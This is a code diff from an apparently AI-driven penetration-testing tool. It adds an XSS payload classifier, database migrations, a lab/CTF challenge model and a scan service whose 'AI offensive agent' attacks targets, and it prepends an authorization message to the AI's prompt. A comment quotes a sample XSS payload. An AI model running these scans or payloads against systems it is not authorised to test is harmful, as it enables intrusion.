        if "onerror" in events_in_payload and ("src=" in payload_lower or "src =" in payload_lower):
            auto_events.add("onerror")
            interactive_events.discard("onerror")
    # svg/body/math onload fires on parse
    if primary_tag in ("svg", "body", "math") and "onload" in events_in_payload:
        auto_events.add("onload")
        interactive_events.discard("onload")
    # SVG animation elements fire onbegin automatically
    if primary_tag in ("animate", "animatetransform", "set", "discard") and "onbegin" in events_in_payload:
        auto_events.add("onbegin")
        interactive_events.discard("onbegin")
    # Auto-firing events execute without user action; check these BEFORE the
    # javascript: URI heuristic so e.g. <img src=javascript:x onerror=alert(1)>
    # is reported as executable. (Bug fix: the original order let the
    # javascript: branch downgrade auto-firing payloads to interactive.)
    if auto_events:
        result.update({
            "executable": True,
            "interactive": False,
            "context": "injected_tag_auto",
            "confidence": 0.95,
            "detail": f"Payload injects <{primary_tag}> with auto-firing event(s): {', '.join(auto_events)}",
        })
        return result
    # javascript: URI requires the user to follow/activate the link
    if "javascript:" in payload_lower:
        result.update({
            "executable": False,
            "interactive": True,
            "context": "injected_js_uri",
            "confidence": 0.90,
            "detail": f"Payload injects <{primary_tag}> with javascript: URI",
        })
        return result
    if interactive_events:
        result.update({
            "executable": False,
            "interactive": True,
            "context": "injected_tag_interactive",
            "confidence": 0.85,
            "detail": f"Payload injects <{primary_tag}> with interactive event(s): {', '.join(interactive_events)}",
        })
        return result
    # Tag injected but no event handlers at all
    result.update({
        "context": "injected_tag_no_event",
        "confidence": 0.4,
        "detail": f"Payload injects <{primary_tag}> but without executable event handlers",
    })
    return result
+70
View File
@@ -87,6 +87,30 @@ async def _run_migrations(conn):
logger.info("Adding 'poc_evidence' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN poc_evidence TEXT"))
if "screenshots" not in columns:
logger.info("Adding 'screenshots' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN screenshots JSON DEFAULT '[]'"))
if "url" not in columns:
logger.info("Adding 'url' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN url TEXT"))
if "parameter" not in columns:
logger.info("Adding 'parameter' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN parameter VARCHAR(500)"))
if "validation_status" not in columns:
logger.info("Adding 'validation_status' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN validation_status VARCHAR(20) DEFAULT 'ai_confirmed'"))
if "ai_rejection_reason" not in columns:
logger.info("Adding 'ai_rejection_reason' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN ai_rejection_reason TEXT"))
if "poc_code" not in columns:
logger.info("Adding 'poc_code' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN poc_code TEXT"))
# Check if agent_tasks table exists
result = await conn.execute(
text("SELECT name FROM sqlite_master WHERE type='table' AND name='agent_tasks'")
@@ -142,6 +166,52 @@ async def _run_migrations(conn):
"""))
await conn.execute(text("CREATE INDEX IF NOT EXISTS idx_vulnerability_tests_scan_id ON vulnerability_tests(scan_id)"))
# Check if vuln_lab_challenges table exists
result = await conn.execute(
text("SELECT name FROM sqlite_master WHERE type='table' AND name='vuln_lab_challenges'")
)
if not result.fetchone():
logger.info("Creating 'vuln_lab_challenges' table...")
await conn.execute(text("""
CREATE TABLE vuln_lab_challenges (
id VARCHAR(36) PRIMARY KEY,
target_url TEXT NOT NULL,
challenge_name VARCHAR(255),
vuln_type VARCHAR(100) NOT NULL,
vuln_category VARCHAR(50),
auth_type VARCHAR(20),
auth_value TEXT,
status VARCHAR(20) DEFAULT 'pending',
result VARCHAR(20),
agent_id VARCHAR(36),
scan_id VARCHAR(36),
findings_count INTEGER DEFAULT 0,
critical_count INTEGER DEFAULT 0,
high_count INTEGER DEFAULT 0,
medium_count INTEGER DEFAULT 0,
low_count INTEGER DEFAULT 0,
info_count INTEGER DEFAULT 0,
findings_detail JSON DEFAULT '[]',
started_at DATETIME,
completed_at DATETIME,
duration INTEGER,
notes TEXT,
logs JSON DEFAULT '[]',
endpoints_count INTEGER DEFAULT 0,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP
)
"""))
await conn.execute(text("CREATE INDEX IF NOT EXISTS idx_vuln_lab_status ON vuln_lab_challenges(status)"))
await conn.execute(text("CREATE INDEX IF NOT EXISTS idx_vuln_lab_vuln_type ON vuln_lab_challenges(vuln_type)"))
else:
# Migrate existing table - add new columns if missing
result = await conn.execute(text("PRAGMA table_info(vuln_lab_challenges)"))
columns = [row[1] for row in result.fetchall()]
if "logs" not in columns:
await conn.execute(text("ALTER TABLE vuln_lab_challenges ADD COLUMN logs JSON DEFAULT '[]'"))
if "endpoints_count" not in columns:
await conn.execute(text("ALTER TABLE vuln_lab_challenges ADD COLUMN endpoints_count INTEGER DEFAULT 0"))
logger.info("Database migrations completed")
except Exception as e:
logger.warning(f"Migration check failed (may be normal on first run): {e}")
+41 -1
View File
@@ -11,7 +11,7 @@ from pathlib import Path
from backend.config import settings
from backend.db.database import init_db, close_db
from backend.api.v1 import scans, targets, prompts, reports, dashboard, vulnerabilities, settings as settings_router, agent, agent_tasks
from backend.api.v1 import scans, targets, prompts, reports, dashboard, vulnerabilities, settings as settings_router, agent, agent_tasks, scheduler, vuln_lab, terminal, sandbox
from backend.api.websocket import manager as ws_manager
@@ -23,9 +23,45 @@ async def lifespan(app: FastAPI):
await init_db()
print("Database initialized")
# Initialize scheduler
try:
import json
config_path = Path(__file__).parent.parent / "config" / "config.json"
if config_path.exists():
with open(config_path) as f:
config = json.load(f)
from core.scheduler import ScanScheduler
scan_scheduler = ScanScheduler(config)
scan_scheduler.start()
app.state.scheduler = scan_scheduler
print(f"Scheduler initialized (enabled={scan_scheduler.enabled})")
else:
app.state.scheduler = None
except Exception as e:
print(f"Scheduler init skipped: {e}")
app.state.scheduler = None
# Cleanup orphan sandbox containers from previous crashes
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_orphans()
print("Sandbox pool initialized (orphan cleanup done)")
except Exception as e:
print(f"Sandbox pool init skipped: {e}")
yield
# Shutdown
# Destroy all per-scan sandbox containers
try:
from core.container_pool import get_pool
await get_pool().cleanup_all()
print("Sandbox containers cleaned up")
except Exception:
pass
if hasattr(app.state, 'scheduler') and app.state.scheduler:
app.state.scheduler.stop()
print("Shutting down...")
await close_db()
@@ -60,6 +96,10 @@ app.include_router(vulnerabilities.router, prefix="/api/v1/vulnerabilities", tag
app.include_router(settings_router.router, prefix="/api/v1/settings", tags=["Settings"])
app.include_router(agent.router, prefix="/api/v1/agent", tags=["AI Agent"])
app.include_router(agent_tasks.router, prefix="/api/v1/agent-tasks", tags=["Agent Tasks"])
app.include_router(scheduler.router, prefix="/api/v1/scheduler", tags=["Scheduler"])
app.include_router(vuln_lab.router, prefix="/api/v1/vuln-lab", tags=["Vulnerability Lab"])
app.include_router(terminal.router, prefix="/api/v1/terminal", tags=["Terminal Agent"])
app.include_router(sandbox.router, prefix="/api/v1/sandbox", tags=["Sandbox"])
@app.get("/api/health")
+3 -1
View File
@@ -5,6 +5,7 @@ from backend.models.endpoint import Endpoint
from backend.models.vulnerability import Vulnerability, VulnerabilityTest
from backend.models.report import Report
from backend.models.agent_task import AgentTask
from backend.models.vuln_lab import VulnLabChallenge
__all__ = [
"Scan",
@@ -14,5 +15,6 @@ __all__ = [
"Vulnerability",
"VulnerabilityTest",
"Report",
"AgentTask"
"AgentTask",
"VulnLabChallenge"
]
+94
View File
@@ -0,0 +1,94 @@
"""
NeuroSploit v3 - Vulnerability Lab Challenge Model
Tracks isolated vulnerability testing sessions (labs, CTFs, PortSwigger, etc.)
"""
from datetime import datetime
from typing import Optional, List
from sqlalchemy import String, Integer, Float, Boolean, DateTime, Text, JSON, ForeignKey
from sqlalchemy.orm import Mapped, mapped_column
from backend.db.database import Base
import uuid
class VulnLabChallenge(Base):
    """Individual vulnerability lab/challenge test record.

    Tracks one isolated testing session against a lab/CTF target
    (PortSwigger Academy, DVWA, etc.) scoped to a single vulnerability
    type, including execution state, per-severity finding counts,
    timing, and persisted logs.
    """
    __tablename__ = "vuln_lab_challenges"
    # UUID4 primary key, generated per row
    id: Mapped[str] = mapped_column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
    # Target info
    target_url: Mapped[str] = mapped_column(Text)
    challenge_name: Mapped[Optional[str]] = mapped_column(String(255), nullable=True)
    # Vulnerability scope
    vuln_type: Mapped[str] = mapped_column(String(100))  # e.g. xss_reflected, sqli_union
    vuln_category: Mapped[Optional[str]] = mapped_column(String(50), nullable=True)  # injection, auth, client_side, etc.
    # Authentication (auth_value holds the credential/token and is
    # deliberately NOT exposed by to_dict)
    auth_type: Mapped[Optional[str]] = mapped_column(String(20), nullable=True)  # cookie, bearer, basic, header
    auth_value: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
    # Execution state
    status: Mapped[str] = mapped_column(String(20), default="pending")  # pending, running, completed, failed, stopped
    result: Mapped[Optional[str]] = mapped_column(String(20), nullable=True)  # detected, not_detected, error
    # Agent linkage (loose references, no FK constraints)
    agent_id: Mapped[Optional[str]] = mapped_column(String(36), nullable=True)
    scan_id: Mapped[Optional[str]] = mapped_column(String(36), nullable=True)
    # Results: total plus per-severity breakdown
    findings_count: Mapped[int] = mapped_column(Integer, default=0)
    critical_count: Mapped[int] = mapped_column(Integer, default=0)
    high_count: Mapped[int] = mapped_column(Integer, default=0)
    medium_count: Mapped[int] = mapped_column(Integer, default=0)
    low_count: Mapped[int] = mapped_column(Integer, default=0)
    info_count: Mapped[int] = mapped_column(Integer, default=0)
    # Findings detail (JSON list of finding summaries)
    findings_detail: Mapped[List] = mapped_column(JSON, default=list)
    # Timing
    started_at: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True)
    completed_at: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True)
    duration: Mapped[Optional[int]] = mapped_column(Integer, nullable=True)  # seconds
    # Notes
    notes: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
    # Logs (JSON list of log entries persisted after completion)
    logs: Mapped[List] = mapped_column(JSON, default=list)
    # Endpoints discovered count
    endpoints_count: Mapped[int] = mapped_column(Integer, default=0)
    # Timestamps
    created_at: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow)

    def to_dict(self) -> dict:
        """Serialize for API responses.

        Datetimes are ISO-formatted; JSON columns fall back to empty lists
        when NULL. ``auth_value`` is intentionally omitted so credentials
        never leak into API payloads.
        """
        return {
            "id": self.id,
            "target_url": self.target_url,
            "challenge_name": self.challenge_name,
            "vuln_type": self.vuln_type,
            "vuln_category": self.vuln_category,
            "auth_type": self.auth_type,
            "status": self.status,
            "result": self.result,
            "agent_id": self.agent_id,
            "scan_id": self.scan_id,
            "findings_count": self.findings_count,
            "critical_count": self.critical_count,
            "high_count": self.high_count,
            "medium_count": self.medium_count,
            "low_count": self.low_count,
            "info_count": self.info_count,
            "findings_detail": self.findings_detail or [],
            "started_at": self.started_at.isoformat() if self.started_at else None,
            "completed_at": self.completed_at.isoformat() if self.completed_at else None,
            "duration": self.duration,
            "notes": self.notes,
            "logs": self.logs or [],
            "endpoints_count": self.endpoints_count,
            "created_at": self.created_at.isoformat() if self.created_at else None,
        }
+21
View File
@@ -87,6 +87,21 @@ class Vulnerability(Base):
# AI Analysis
ai_analysis: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# PoC Code (executable proof-of-concept: HTML, Python, curl, etc.)
poc_code: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# Screenshots (list of base64 data URIs or filesystem paths)
screenshots: Mapped[List] = mapped_column(JSON, default=list)
# Source URL and parameter (for finding_id reconstruction)
url: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
parameter: Mapped[Optional[str]] = mapped_column(String(500), nullable=True)
# Validation status (manual review workflow)
validation_status: Mapped[str] = mapped_column(String(20), default="ai_confirmed")
# Values: "ai_confirmed" | "ai_rejected" | "validated" | "false_positive" | "pending_review"
ai_rejection_reason: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# Timestamps
created_at: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow)
@@ -116,5 +131,11 @@ class Vulnerability(Base):
"remediation": self.remediation,
"references": self.references,
"ai_analysis": self.ai_analysis,
"poc_code": self.poc_code,
"screenshots": self.screenshots or [],
"url": self.url,
"parameter": self.parameter,
"validation_status": self.validation_status or "ai_confirmed",
"ai_rejection_reason": self.ai_rejection_reason,
"created_at": self.created_at.isoformat() if self.created_at else None
}
+3
View File
@@ -23,6 +23,9 @@ python-jose[cryptography]>=3.3.0
jinja2>=3.1.0
weasyprint>=60.0; platform_system != "Windows"
# Scheduling
apscheduler>=3.10.0
# Development
httpx>=0.26.0
pytest>=7.4.0
+319 -213
View File
@@ -29,6 +29,39 @@ from backend.core.vuln_engine.engine import DynamicVulnerabilityEngine
from backend.core.vuln_engine.payload_generator import PayloadGenerator
from backend.core.autonomous_scanner import AutonomousScanner
from backend.core.ai_pentest_agent import AIPentestAgent
from backend.core.ai_prompt_processor import TestingPlan
# Phase control: signaling between API and running background tasks
_scan_phase_control: Dict[str, str] = {} # scan_id → target_phase
PHASE_ORDER = ["initializing", "recon", "analyzing", "testing", "completed"]
def skip_to_phase(scan_id: str, target_phase: str) -> bool:
    """Signal a running scan to skip ahead to the given phase.

    Records the request in the module-level phase-control map; the scan's
    background task picks it up at its next checkpoint. Returns True when
    recorded, False for an unknown phase name.
    """
    if target_phase in PHASE_ORDER:
        _scan_phase_control[scan_id] = target_phase
        return True
    return False
def _default_skip_plan() -> "TestingPlan":
    """Default testing plan used when analysis phase is skipped."""
    # Broad coverage across injection, file, request-forgery and auth classes
    vuln_types = [
        "xss_reflected", "sqli_error", "sqli_blind", "command_injection",
        "lfi", "path_traversal", "ssrf", "auth_bypass", "idor",
        "cors_misconfiguration", "open_redirect", "missing_security_headers",
        "rfi", "csrf", "xxe", "ssti",
    ]
    priorities = ["SQL Injection", "XSS", "Command Injection", "SSRF", "Authentication"]
    return TestingPlan(
        vulnerability_types=vuln_types,
        testing_focus=["Comprehensive vulnerability assessment (analysis phase skipped)"],
        custom_payloads=[],
        testing_depth="medium",
        specific_endpoints=[],
        bypass_techniques=[],
        priority_order=priorities,
        ai_reasoning="Default testing plan - AI analysis phase was skipped by user",
    )
# Global authorization message for AI
@@ -72,6 +105,21 @@ class ScanService:
self.payload_generator = PayloadGenerator()
self._stop_requested = False
def _should_skip_phase(self, scan_id: str, current_phase: str) -> Optional[str]:
"""Check if the scan should skip ahead to a different phase.
Returns the target phase if skip is needed, None otherwise."""
target = _scan_phase_control.pop(scan_id, None)
if not target:
return None
try:
cur_idx = PHASE_ORDER.index(current_phase)
tgt_idx = PHASE_ORDER.index(target)
if tgt_idx > cur_idx:
return target
except ValueError:
pass
return None
async def _create_agent_task(
self,
scan_id: str,
@@ -192,7 +240,19 @@ class ScanService:
# Phase 1: REAL Reconnaissance (if enabled)
recon_data = {}
if scan.recon_enabled:
skip_target = self._should_skip_phase(scan_id, "initializing")
recon_skipped = False
if skip_target:
# User requested skip from initializing
skip_idx = PHASE_ORDER.index(skip_target)
if skip_idx >= PHASE_ORDER.index("recon"):
recon_skipped = True
await ws_manager.broadcast_log(scan_id, "warning", "")
await ws_manager.broadcast_log(scan_id, "warning", ">> PHASE SKIPPED: Reconnaissance (user request)")
await ws_manager.broadcast_phase_change(scan_id, "recon_skipped")
scan.recon_enabled = False
if scan.recon_enabled and not recon_skipped:
scan.current_phase = "recon"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "recon")
@@ -356,247 +416,293 @@ class ScanService:
await self.db.commit()
await ws_manager.broadcast_log(scan_id, "info", f"Autonomous discovery complete. Total endpoints: {scan.total_endpoints}")
# Phase 2: AI Prompt Processing
scan.current_phase = "analyzing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "analyzing")
await ws_manager.broadcast_progress(scan_id, 40, "AI analyzing prompt and data...")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 2: AI ANALYSIS")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
# Check for phase skip before analysis
skip_target = self._should_skip_phase(scan_id, "recon") or (skip_target if skip_target and PHASE_ORDER.index(skip_target) >= PHASE_ORDER.index("analyzing") else None)
analysis_skipped = False
testing_plan = None
# Create AI analysis task
analysis_task = await self._create_agent_task(
scan_id=scan_id,
task_type="analysis",
task_name="AI Strategy Analysis",
if skip_target and PHASE_ORDER.index(skip_target) >= PHASE_ORDER.index("analyzing"):
analysis_skipped = True
testing_plan = _default_skip_plan()
await ws_manager.broadcast_log(scan_id, "warning", "")
await ws_manager.broadcast_log(scan_id, "warning", ">> PHASE SKIPPED: AI Analysis (user request)")
await ws_manager.broadcast_log(scan_id, "info", f"Using default testing plan with {len(testing_plan.vulnerability_types)} vulnerability types")
await ws_manager.broadcast_phase_change(scan_id, "analyzing_skipped")
if skip_target == "completed":
# User wants to skip everything - finalize
self._stop_requested = True
if not analysis_skipped:
# Phase 2: AI Prompt Processing
scan.current_phase = "analyzing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "analyzing")
await ws_manager.broadcast_progress(scan_id, 40, "AI analyzing prompt and data...")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 2: AI ANALYSIS")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
if not analysis_skipped:
# Create AI analysis task
analysis_task = await self._create_agent_task(
scan_id=scan_id,
task_type="analysis",
task_name="AI Strategy Analysis",
description="Analyzing prompt and recon data to determine testing strategy",
tool_name="ai_prompt_processor",
tool_category="ai"
)
try:
# Enhance prompt with authorization
enhanced_prompt = f"{GLOBAL_AUTHORIZATION}\n\nUSER REQUEST:\n{prompt_content}"
try:
# Enhance prompt with authorization
enhanced_prompt = f"{GLOBAL_AUTHORIZATION}\n\nUSER REQUEST:\n{prompt_content}"
# Get AI-generated testing plan
await ws_manager.broadcast_log(scan_id, "info", "AI processing prompt and determining attack strategy...")
# Get AI-generated testing plan
await ws_manager.broadcast_log(scan_id, "info", "AI processing prompt and determining attack strategy...")
testing_plan = await self.ai_processor.process_prompt(
prompt=enhanced_prompt,
recon_data=recon_data,
target_info={"targets": [t.url for t in targets]}
)
testing_plan = await self.ai_processor.process_prompt(
prompt=enhanced_prompt,
recon_data=recon_data,
target_info={"targets": [t.url for t in targets]}
)
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "AI TESTING PLAN:")
await ws_manager.broadcast_log(scan_id, "info", f" Vulnerability Types: {', '.join(testing_plan.vulnerability_types[:10])}")
if len(testing_plan.vulnerability_types) > 10:
await ws_manager.broadcast_log(scan_id, "info", f" ... and {len(testing_plan.vulnerability_types) - 10} more types")
await ws_manager.broadcast_log(scan_id, "info", f" Testing Focus: {', '.join(testing_plan.testing_focus[:5])}")
await ws_manager.broadcast_log(scan_id, "info", f" Depth: {testing_plan.testing_depth}")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", f"AI Reasoning: {testing_plan.ai_reasoning[:300]}...")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "AI TESTING PLAN:")
await ws_manager.broadcast_log(scan_id, "info", f" Vulnerability Types: {', '.join(testing_plan.vulnerability_types[:10])}")
if len(testing_plan.vulnerability_types) > 10:
await ws_manager.broadcast_log(scan_id, "info", f" ... and {len(testing_plan.vulnerability_types) - 10} more types")
await ws_manager.broadcast_log(scan_id, "info", f" Testing Focus: {', '.join(testing_plan.testing_focus[:5])}")
await ws_manager.broadcast_log(scan_id, "info", f" Depth: {testing_plan.testing_depth}")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", f"AI Reasoning: {testing_plan.ai_reasoning[:300]}...")
await self._complete_agent_task(
analysis_task,
items_processed=1,
items_found=len(testing_plan.vulnerability_types),
summary=f"Generated testing plan with {len(testing_plan.vulnerability_types)} vulnerability types"
)
except Exception as e:
await self._fail_agent_task(analysis_task, str(e))
raise
await self._complete_agent_task(
analysis_task,
items_processed=1,
items_found=len(testing_plan.vulnerability_types),
summary=f"Generated testing plan with {len(testing_plan.vulnerability_types)} vulnerability types"
)
except Exception as e:
await self._fail_agent_task(analysis_task, str(e))
raise
# Ensure testing_plan exists (either from AI or default skip plan)
if testing_plan is None:
testing_plan = _default_skip_plan()
await ws_manager.broadcast_progress(scan_id, 45, f"Testing {len(testing_plan.vulnerability_types)} vuln types")
# Phase 3: AI OFFENSIVE AGENT
scan.current_phase = "testing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "testing")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 3: AI OFFENSIVE AGENT")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
# Run the AI Offensive Agent for each target
for target in targets:
await ws_manager.broadcast_log(scan_id, "info", f"Deploying AI Agent on: {target.url}")
# Create AI pentest agent task
agent_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name=f"AI Pentest Agent: {target.hostname or target.url[:30]}",
description=f"AI-powered penetration testing on {target.url}",
tool_name="ai_pentest_agent",
tool_category="ai"
)
try:
# Create log callback for the agent
async def agent_log(level: str, message: str):
await ws_manager.broadcast_log(scan_id, level, message)
# Build auth headers
auth_headers = self._build_auth_headers(scan)
findings_count = 0
endpoints_tested = 0
async with AIPentestAgent(
target=target.url,
log_callback=agent_log,
auth_headers=auth_headers,
max_depth=5
) as agent:
agent_report = await agent.run()
# Save agent findings as vulnerabilities
for finding in agent_report.get("findings", []):
finding_severity = finding["severity"]
vuln = Vulnerability(
scan_id=scan_id,
title=f"{finding['type'].upper()} - {finding['endpoint'][:50]}",
vulnerability_type=finding["type"],
severity=finding_severity,
description=finding["evidence"],
affected_endpoint=finding["endpoint"],
poc_payload=finding["payload"],
poc_request=finding.get("raw_request", "")[:5000],
poc_response=finding.get("raw_response", "")[:5000],
remediation=finding.get("impact", ""),
ai_analysis="\n".join(finding.get("exploitation_steps", []))
)
self.db.add(vuln)
await self.db.flush() # Ensure ID is assigned
findings_count += 1
# Increment vulnerability count
await self._increment_vulnerability_count(scan, finding_severity)
await ws_manager.broadcast_vulnerability_found(scan_id, {
"id": vuln.id,
"title": vuln.title,
"severity": vuln.severity,
"type": finding["type"],
"endpoint": finding["endpoint"]
})
# Update endpoint count
endpoints_tested = agent_report.get("summary", {}).get("total_endpoints", 0)
scan.total_endpoints += endpoints_tested
await self._complete_agent_task(
agent_task,
items_processed=endpoints_tested,
items_found=findings_count,
summary=f"Tested {endpoints_tested} endpoints, found {findings_count} vulnerabilities"
)
except Exception as e:
await self._fail_agent_task(agent_task, str(e))
# Check for phase skip before testing
skip_target = self._should_skip_phase(scan_id, "analyzing")
testing_skipped = False
if skip_target and PHASE_ORDER.index(skip_target) >= PHASE_ORDER.index("testing"):
if skip_target == "completed":
testing_skipped = True
self._stop_requested = True
await ws_manager.broadcast_log(scan_id, "warning", "")
await ws_manager.broadcast_log(scan_id, "warning", ">> PHASE SKIPPED: Testing (user request - jumping to completion)")
await ws_manager.broadcast_phase_change(scan_id, "testing_skipped")
if not testing_skipped:
# Phase 3: AI OFFENSIVE AGENT
scan.current_phase = "testing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "testing")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 3: AI OFFENSIVE AGENT")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
# Continue with additional AI-driven testing
# Get all endpoints to test
endpoints_result = await self.db.execute(
select(Endpoint).where(Endpoint.scan_id == scan_id)
)
endpoints = list(endpoints_result.scalars().all())
# Add URLs from recon as endpoints
for url in recon_data.get("urls", [])[:100]: # Test up to 100 URLs
if "?" in url and url not in [e.url for e in endpoints]:
endpoint = Endpoint(
scan_id=scan_id,
url=url,
method="GET",
path=url.split("?")[0].split("/")[-1] if "/" in url else "/"
)
self.db.add(endpoint)
endpoints.append(endpoint)
await self.db.commit()
# If STILL no endpoints, create from targets with common paths
if not endpoints:
await ws_manager.broadcast_log(scan_id, "warning", "No endpoints found. Creating test endpoints from targets...")
common_paths = [
"/", "/login", "/admin", "/api", "/search", "/user",
"/?id=1", "/?page=1", "/?q=test", "/?search=test"
]
# Run the AI Offensive Agent for each target
for target in targets:
for path in common_paths:
url = target.url.rstrip("/") + path
await ws_manager.broadcast_log(scan_id, "info", f"Deploying AI Agent on: {target.url}")
# Create AI pentest agent task
agent_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name=f"AI Pentest Agent: {target.hostname or target.url[:30]}",
description=f"AI-powered penetration testing on {target.url}",
tool_name="ai_pentest_agent",
tool_category="ai"
)
try:
# Create log callback for the agent
async def agent_log(level: str, message: str):
await ws_manager.broadcast_log(scan_id, level, message)
# Build auth headers
auth_headers = self._build_auth_headers(scan)
findings_count = 0
endpoints_tested = 0
async with AIPentestAgent(
target=target.url,
log_callback=agent_log,
auth_headers=auth_headers,
max_depth=5
) as agent:
agent_report = await agent.run()
# Save agent findings as vulnerabilities
for finding in agent_report.get("findings", []):
finding_severity = finding["severity"]
vuln = Vulnerability(
scan_id=scan_id,
title=f"{finding['type'].upper()} - {finding['endpoint'][:50]}",
vulnerability_type=finding["type"],
severity=finding_severity,
description=finding["evidence"],
affected_endpoint=finding["endpoint"],
poc_payload=finding["payload"],
poc_request=finding.get("raw_request", "")[:5000],
poc_response=finding.get("raw_response", "")[:5000],
remediation=finding.get("impact", ""),
ai_analysis="\n".join(finding.get("exploitation_steps", []))
)
self.db.add(vuln)
await self.db.flush() # Ensure ID is assigned
findings_count += 1
# Increment vulnerability count
await self._increment_vulnerability_count(scan, finding_severity)
await ws_manager.broadcast_vulnerability_found(scan_id, {
"id": vuln.id,
"title": vuln.title,
"severity": vuln.severity,
"type": finding["type"],
"endpoint": finding["endpoint"]
})
# Update endpoint count
endpoints_tested = agent_report.get("summary", {}).get("total_endpoints", 0)
scan.total_endpoints += endpoints_tested
await self._complete_agent_task(
agent_task,
items_processed=endpoints_tested,
items_found=findings_count,
summary=f"Tested {endpoints_tested} endpoints, found {findings_count} vulnerabilities"
)
except Exception as e:
await self._fail_agent_task(agent_task, str(e))
await self.db.commit()
# Continue with additional AI-driven testing
# Get all endpoints to test
endpoints_result = await self.db.execute(
select(Endpoint).where(Endpoint.scan_id == scan_id)
)
endpoints = list(endpoints_result.scalars().all())
# Add URLs from recon as endpoints
for url in recon_data.get("urls", [])[:100]: # Test up to 100 URLs
if "?" in url and url not in [e.url for e in endpoints]:
endpoint = Endpoint(
scan_id=scan_id,
target_id=target.id,
url=url,
method="GET",
path=path
path=url.split("?")[0].split("/")[-1] if "/" in url else "/"
)
self.db.add(endpoint)
endpoints.append(endpoint)
scan.total_endpoints += 1
await self.db.commit()
await ws_manager.broadcast_log(scan_id, "info", f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vuln types")
await ws_manager.broadcast_log(scan_id, "info", "")
# If STILL no endpoints, create from targets with common paths
if not endpoints:
await ws_manager.broadcast_log(scan_id, "warning", "No endpoints found. Creating test endpoints from targets...")
common_paths = [
"/", "/login", "/admin", "/api", "/search", "/user",
"/?id=1", "/?page=1", "/?q=test", "/?search=test"
]
for target in targets:
for path in common_paths:
url = target.url.rstrip("/") + path
endpoint = Endpoint(
scan_id=scan_id,
target_id=target.id,
url=url,
method="GET",
path=path
)
self.db.add(endpoint)
endpoints.append(endpoint)
scan.total_endpoints += 1
await self.db.commit()
# Create vulnerability testing task
vuln_testing_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name="Vulnerability Testing",
description=f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vulnerability types",
tool_name="dynamic_vuln_engine",
tool_category="scanner"
)
await ws_manager.broadcast_log(scan_id, "info", f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vuln types")
await ws_manager.broadcast_log(scan_id, "info", "")
try:
# Test endpoints with AI-determined vulnerabilities
total_endpoints = len(endpoints)
endpoints_tested = 0
vulns_before = scan.total_vulnerabilities
async with DynamicVulnerabilityEngine() as engine:
for i, endpoint in enumerate(endpoints):
if self._stop_requested:
break
progress = 45 + int((i / total_endpoints) * 45)
await ws_manager.broadcast_progress(
scan_id, progress,
f"Testing {i+1}/{total_endpoints}: {endpoint.path or endpoint.url[:50]}"
)
# Log what we're testing
await ws_manager.broadcast_log(scan_id, "debug", f"[{i+1}/{total_endpoints}] Testing: {endpoint.url[:80]}")
await self._test_endpoint_with_ai(
scan=scan,
endpoint=endpoint,
testing_plan=testing_plan,
engine=engine,
recon_data=recon_data
)
endpoints_tested += 1
# Update final counts
await self._update_vulnerability_counts(scan)
vulns_found = scan.total_vulnerabilities - vulns_before
await self._complete_agent_task(
vuln_testing_task,
items_processed=endpoints_tested,
items_found=vulns_found,
summary=f"Tested {endpoints_tested} endpoints, found {vulns_found} vulnerabilities"
# Create vulnerability testing task
vuln_testing_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name="Vulnerability Testing",
description=f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vulnerability types",
